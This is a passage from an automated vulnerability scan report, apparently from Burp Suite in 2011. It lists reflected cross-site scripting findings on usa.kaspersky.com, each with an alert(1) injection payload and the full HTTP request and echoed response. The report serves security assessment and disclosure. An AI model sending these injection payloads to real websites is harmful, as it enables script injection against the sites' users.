<link rel="canonical" href="http://usa.kaspersky.com/sites/usa.kaspersky.com/files/718x96_Store-2012Promo.jpg95dba"><script>alert(1)</script>e48d751b1d4?1311949149" />
...[SNIP]...

1.208. http://usa.kaspersky.com/sites/usa.kaspersky.com/files/ctools/css/4d9813e9d0c158247f09dd5a908f5979.css [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/sites/usa.kaspersky.com/files/ctools/css/4d9813e9d0c158247f09dd5a908f5979.css

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7d226"-alert(1)-"5cbfac5401b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /sites7d226"-alert(1)-"5cbfac5401b/usa.kaspersky.com/files/ctools/css/4d9813e9d0c158247f09dd5a908f5979.css?R HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
Referer: http://usa.kaspersky.com/?domain=kapersky.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Cache-Control: public, max-age=21600
Last-Modified: Sun, 04 Sep 2011 12:19:59 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1315138799"
Content-Type: text/html; charset=utf-8
Content-Length: 33731
Date: Sun, 04 Sep 2011 12:20:01 GMT
X-Varnish: 1163045797
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
'yes') { s.prop4 = " Thank You"; }
s.pageName = s.prop4;
s.eVar44 = s.pageName;
s.hier1 = s.pageName;
s.channel = s.prop1;
s.server=location.hostname;
s.pageName="404:http://usa.kaspersky.com/sites7d226"-alert(1)-"5cbfac5401b/usa.kaspersky.com/files/ctools/css/4d9813e9d0c158247f09dd5a908f5979.css?R";

/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)document.write(s_code)//-
...[SNIP]...

1.209. http://usa.kaspersky.com/sites/usa.kaspersky.com/files/ctools/css/4d9813e9d0c158247f09dd5a908f5979.css [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/sites/usa.kaspersky.com/files/ctools/css/4d9813e9d0c158247f09dd5a908f5979.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5d2ac"><script>alert(1)</script>6aad20417ca was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sites5d2ac"><script>alert(1)</script>6aad20417ca/usa.kaspersky.com/files/ctools/css/4d9813e9d0c158247f09dd5a908f5979.css?R HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
Referer: http://usa.kaspersky.com/?domain=kapersky.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Cache-Control: public, max-age=21600
Last-Modified: Sun, 04 Sep 2011 12:19:52 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1315138792"
Content-Type: text/html; charset=utf-8
Content-Length: 32580
Date: Sun, 04 Sep 2011 12:19:55 GMT
X-Varnish: 1163045716
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/sites5d2ac"><script>alert(1)</script>6aad20417ca/usa.kaspersky.com/files/ctools/css/4d9813e9d0c158247f09dd5a908f5979.css?R" />
...[SNIP]...

1.210. http://usa.kaspersky.com/sites/usa.kaspersky.com/files/ctools/css/4d9813e9d0c158247f09dd5a908f5979.css [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/sites/usa.kaspersky.com/files/ctools/css/4d9813e9d0c158247f09dd5a908f5979.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 815b2"><script>alert(1)</script>37f0e3b07ae was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sites/usa.kaspersky.com815b2"><script>alert(1)</script>37f0e3b07ae/files/ctools/css/4d9813e9d0c158247f09dd5a908f5979.css?R HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
Referer: http://usa.kaspersky.com/?domain=kapersky.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Cache-Control: public, max-age=21600
Last-Modified: Sun, 04 Sep 2011 12:20:22 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1315138822"
Content-Type: text/html; charset=utf-8
Content-Length: 32572
Date: Sun, 04 Sep 2011 12:20:24 GMT
X-Varnish: 1163046521
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/sites/usa.kaspersky.com815b2"><script>alert(1)</script>37f0e3b07ae/files/ctools/css/4d9813e9d0c158247f09dd5a908f5979.css?R" />
...[SNIP]...

1.211. http://usa.kaspersky.com/sites/usa.kaspersky.com/files/ctools/css/4d9813e9d0c158247f09dd5a908f5979.css [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/sites/usa.kaspersky.com/files/ctools/css/4d9813e9d0c158247f09dd5a908f5979.css

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cb994"-alert(1)-"9771fba1a77 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /sites/usa.kaspersky.comcb994"-alert(1)-"9771fba1a77/files/ctools/css/4d9813e9d0c158247f09dd5a908f5979.css?R HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
Referer: http://usa.kaspersky.com/?domain=kapersky.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Cache-Control: public, max-age=21600
Last-Modified: Sun, 04 Sep 2011 12:20:31 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1315138831"
Content-Type: text/html; charset=utf-8
Content-Length: 33782
Date: Sun, 04 Sep 2011 12:20:33 GMT
X-Varnish: 1163046707
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
" Thank You"; }
s.pageName = s.prop4;
s.eVar44 = s.pageName;
s.hier1 = s.pageName;
s.channel = s.prop1;
s.server=location.hostname;
s.pageName="404:http://usa.kaspersky.com/sites/usa.kaspersky.comcb994"-alert(1)-"9771fba1a77/files/ctools/css/4d9813e9d0c158247f09dd5a908f5979.css?R";

/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

1.212. http://usa.kaspersky.com/sites/usa.kaspersky.com/files/ctools/css/4d9813e9d0c158247f09dd5a908f5979.css [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/sites/usa.kaspersky.com/files/ctools/css/4d9813e9d0c158247f09dd5a908f5979.css

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6fd41"-alert(1)-"4857cb508a7 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /sites/usa.kaspersky.com/files6fd41"-alert(1)-"4857cb508a7/ctools/css/4d9813e9d0c158247f09dd5a908f5979.css?R HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
Referer: http://usa.kaspersky.com/?domain=kapersky.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Cache-Control: public, max-age=21600
Last-Modified: Sun, 04 Sep 2011 12:21:09 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1315138869"
Content-Type: text/html; charset=utf-8
Content-Length: 34710
Date: Sun, 04 Sep 2011 12:21:12 GMT
X-Varnish: 1163047910
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
nk You"; }
s.pageName = s.prop4;
s.eVar44 = s.pageName;
s.hier1 = s.pageName;
s.channel = s.prop1;
s.server=location.hostname;
s.pageName="404:http://usa.kaspersky.com/sites/usa.kaspersky.com/files6fd41"-alert(1)-"4857cb508a7/ctools/css/4d9813e9d0c158247f09dd5a908f5979.css?R";

/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

1.213. http://usa.kaspersky.com/sites/usa.kaspersky.com/files/ctools/css/4d9813e9d0c158247f09dd5a908f5979.css [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/sites/usa.kaspersky.com/files/ctools/css/4d9813e9d0c158247f09dd5a908f5979.css

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 52d43"><script>alert(1)</script>2e4b5f14ad6 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sites/usa.kaspersky.com/files52d43"><script>alert(1)</script>2e4b5f14ad6/ctools/css/4d9813e9d0c158247f09dd5a908f5979.css?R HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
Referer: http://usa.kaspersky.com/?domain=kapersky.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Cache-Control: public, max-age=21600
Last-Modified: Sun, 04 Sep 2011 12:21:02 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1315138862"
Content-Type: text/html; charset=utf-8
Content-Length: 32634
Date: Sun, 04 Sep 2011 12:21:04 GMT
X-Varnish: 1163047608
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/sites/usa.kaspersky.com/files52d43"><script>alert(1)</script>2e4b5f14ad6/ctools/css/4d9813e9d0c158247f09dd5a908f5979.css?R" />
...[SNIP]...

1.214. http://usa.kaspersky.com/sites/usa.kaspersky.com/files/ctools/css/4d9813e9d0c158247f09dd5a908f5979.css [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/sites/usa.kaspersky.com/files/ctools/css/4d9813e9d0c158247f09dd5a908f5979.css

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dcb19"><script>alert(1)</script>6efbe913e54 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sites/usa.kaspersky.com/files/ctoolsdcb19"><script>alert(1)</script>6efbe913e54/css/4d9813e9d0c158247f09dd5a908f5979.css?R HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
Referer: http://usa.kaspersky.com/?domain=kapersky.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Cache-Control: public, max-age=21600
Last-Modified: Sun, 04 Sep 2011 12:21:41 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1315138901"
Content-Type: text/html; charset=utf-8
Content-Length: 35243
Date: Sun, 04 Sep 2011 12:21:44 GMT
X-Varnish: 1163048866
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/sites/usa.kaspersky.com/files/ctoolsdcb19"><script>alert(1)</script>6efbe913e54/css/4d9813e9d0c158247f09dd5a908f5979.css?R" />
...[SNIP]...

1.215. http://usa.kaspersky.com/sites/usa.kaspersky.com/files/ctools/css/4d9813e9d0c158247f09dd5a908f5979.css [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/sites/usa.kaspersky.com/files/ctools/css/4d9813e9d0c158247f09dd5a908f5979.css

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4b23a"-alert(1)-"622df54d13d was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /sites/usa.kaspersky.com/files/ctools4b23a"-alert(1)-"622df54d13d/css/4d9813e9d0c158247f09dd5a908f5979.css?R HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
Referer: http://usa.kaspersky.com/?domain=kapersky.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Cache-Control: public, max-age=21600
Last-Modified: Sun, 04 Sep 2011 12:21:51 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1315138911"
Content-Type: text/html; charset=utf-8
Content-Length: 37319
Date: Sun, 04 Sep 2011 12:21:54 GMT
X-Varnish: 1163049128
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
; }
s.pageName = s.prop4;
s.eVar44 = s.pageName;
s.hier1 = s.pageName;
s.channel = s.prop1;
s.server=location.hostname;
s.pageName="404:http://usa.kaspersky.com/sites/usa.kaspersky.com/files/ctools4b23a"-alert(1)-"622df54d13d/css/4d9813e9d0c158247f09dd5a908f5979.css?R";

/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

1.216. http://usa.kaspersky.com/sites/usa.kaspersky.com/files/ctools/css/4d9813e9d0c158247f09dd5a908f5979.css [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/sites/usa.kaspersky.com/files/ctools/css/4d9813e9d0c158247f09dd5a908f5979.css

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 69f5d"><script>alert(1)</script>811dc359d64 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sites/usa.kaspersky.com/files/ctools/css69f5d"><script>alert(1)</script>811dc359d64/4d9813e9d0c158247f09dd5a908f5979.css?R HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
Referer: http://usa.kaspersky.com/?domain=kapersky.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Cache-Control: public, max-age=21600
Last-Modified: Sun, 04 Sep 2011 12:22:28 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1315138948"
Content-Type: text/html; charset=utf-8
Content-Length: 32633
Date: Sun, 04 Sep 2011 12:22:32 GMT
X-Varnish: 1163050310
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/sites/usa.kaspersky.com/files/ctools/css69f5d"><script>alert(1)</script>811dc359d64/4d9813e9d0c158247f09dd5a908f5979.css?R" />
...[SNIP]...

1.217. http://usa.kaspersky.com/sites/usa.kaspersky.com/files/ctools/css/4d9813e9d0c158247f09dd5a908f5979.css [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/sites/usa.kaspersky.com/files/ctools/css/4d9813e9d0c158247f09dd5a908f5979.css

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 769eb"-alert(1)-"a9e76941f9f was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /sites/usa.kaspersky.com/files/ctools/css769eb"-alert(1)-"a9e76941f9f/4d9813e9d0c158247f09dd5a908f5979.css?R HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
Referer: http://usa.kaspersky.com/?domain=kapersky.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Cache-Control: public, max-age=21600
Last-Modified: Sun, 04 Sep 2011 12:22:43 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1315138963"
Content-Type: text/html; charset=utf-8
Content-Length: 34037
Date: Sun, 04 Sep 2011 12:22:50 GMT
X-Varnish: 1163050769
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
s.pageName = s.prop4;
s.eVar44 = s.pageName;
s.hier1 = s.pageName;
s.channel = s.prop1;
s.server=location.hostname;
s.pageName="404:http://usa.kaspersky.com/sites/usa.kaspersky.com/files/ctools/css769eb"-alert(1)-"a9e76941f9f/4d9813e9d0c158247f09dd5a908f5979.css?R";

/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

1.218. http://usa.kaspersky.com/sites/usa.kaspersky.com/files/ctools/css/4d9813e9d0c158247f09dd5a908f5979.css [REST URL parameter 6] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/sites/usa.kaspersky.com/files/ctools/css/4d9813e9d0c158247f09dd5a908f5979.css

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c4e17"><script>alert(1)</script>267d3d6753e was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sites/usa.kaspersky.com/files/ctools/css/4d9813e9d0c158247f09dd5a908f5979.cssc4e17"><script>alert(1)</script>267d3d6753e?R HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
Referer: http://usa.kaspersky.com/?domain=kapersky.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Cache-Control: public, max-age=21600
Last-Modified: Sun, 04 Sep 2011 12:23:46 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1315139026"
Content-Type: text/html; charset=utf-8
Content-Length: 32634
Date: Sun, 04 Sep 2011 12:23:51 GMT
X-Varnish: 1163052465
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/sites/usa.kaspersky.com/files/ctools/css/4d9813e9d0c158247f09dd5a908f5979.cssc4e17"><script>alert(1)</script>267d3d6753e?R" />
...[SNIP]...

1.219. http://usa.kaspersky.com/sites/usa.kaspersky.com/files/ctools/css/4d9813e9d0c158247f09dd5a908f5979.css [REST URL parameter 6] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/sites/usa.kaspersky.com/files/ctools/css/4d9813e9d0c158247f09dd5a908f5979.css

Issue detail

The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c0526"-alert(1)-"1eb0bf43450 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /sites/usa.kaspersky.com/files/ctools/css/4d9813e9d0c158247f09dd5a908f5979.cssc0526"-alert(1)-"1eb0bf43450?R HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
Referer: http://usa.kaspersky.com/?domain=kapersky.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Cache-Control: public, max-age=21600
Last-Modified: Sun, 04 Sep 2011 12:24:05 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1315139045"
Content-Type: text/html; charset=utf-8
Content-Length: 34037
Date: Sun, 04 Sep 2011 12:24:16 GMT
X-Varnish: 1163052951
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
ageName;
s.hier1 = s.pageName;
s.channel = s.prop1;
s.server=location.hostname;
s.pageName="404:http://usa.kaspersky.com/sites/usa.kaspersky.com/files/ctools/css/4d9813e9d0c158247f09dd5a908f5979.cssc0526"-alert(1)-"1eb0bf43450?R";

/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

1.220. http://usa.kaspersky.com/sites/usa.kaspersky.com/files/home-page-banners/10-KSP-0015-PURE-homepage-banner-updated-eng.swf [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/sites/usa.kaspersky.com/files/home-page-banners/10-KSP-0015-PURE-homepage-banner-updated-eng.swf

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6a7f7"-alert(1)-"2f806a7d1f2 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /sites/usa.kaspersky.com/files/home-page-banners/10-KSP-0015-PURE-homepage-banner-updated-eng.swf6a7f7"-alert(1)-"2f806a7d1f2 HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
Referer: http://usa.kaspersky.com/sites/usa.kaspersky.com/files/home-page-banners/loader_purelaunch_updated-frame.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; gpv_pageName=Homepage; s_nr=1315138484684-New; s_sq=%5B%5BB%5D%5D; __utma=205612169.764119128.1315138485.1315138485.1315138485.1; __utmb=205612169.1.10.1315138485; __utmc=205612169; __utmz=205612169.1315138485.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_vi=[CS]v1|2731B5C785013339-4000010CE01E480D[CE]; slider_session=yes

Response

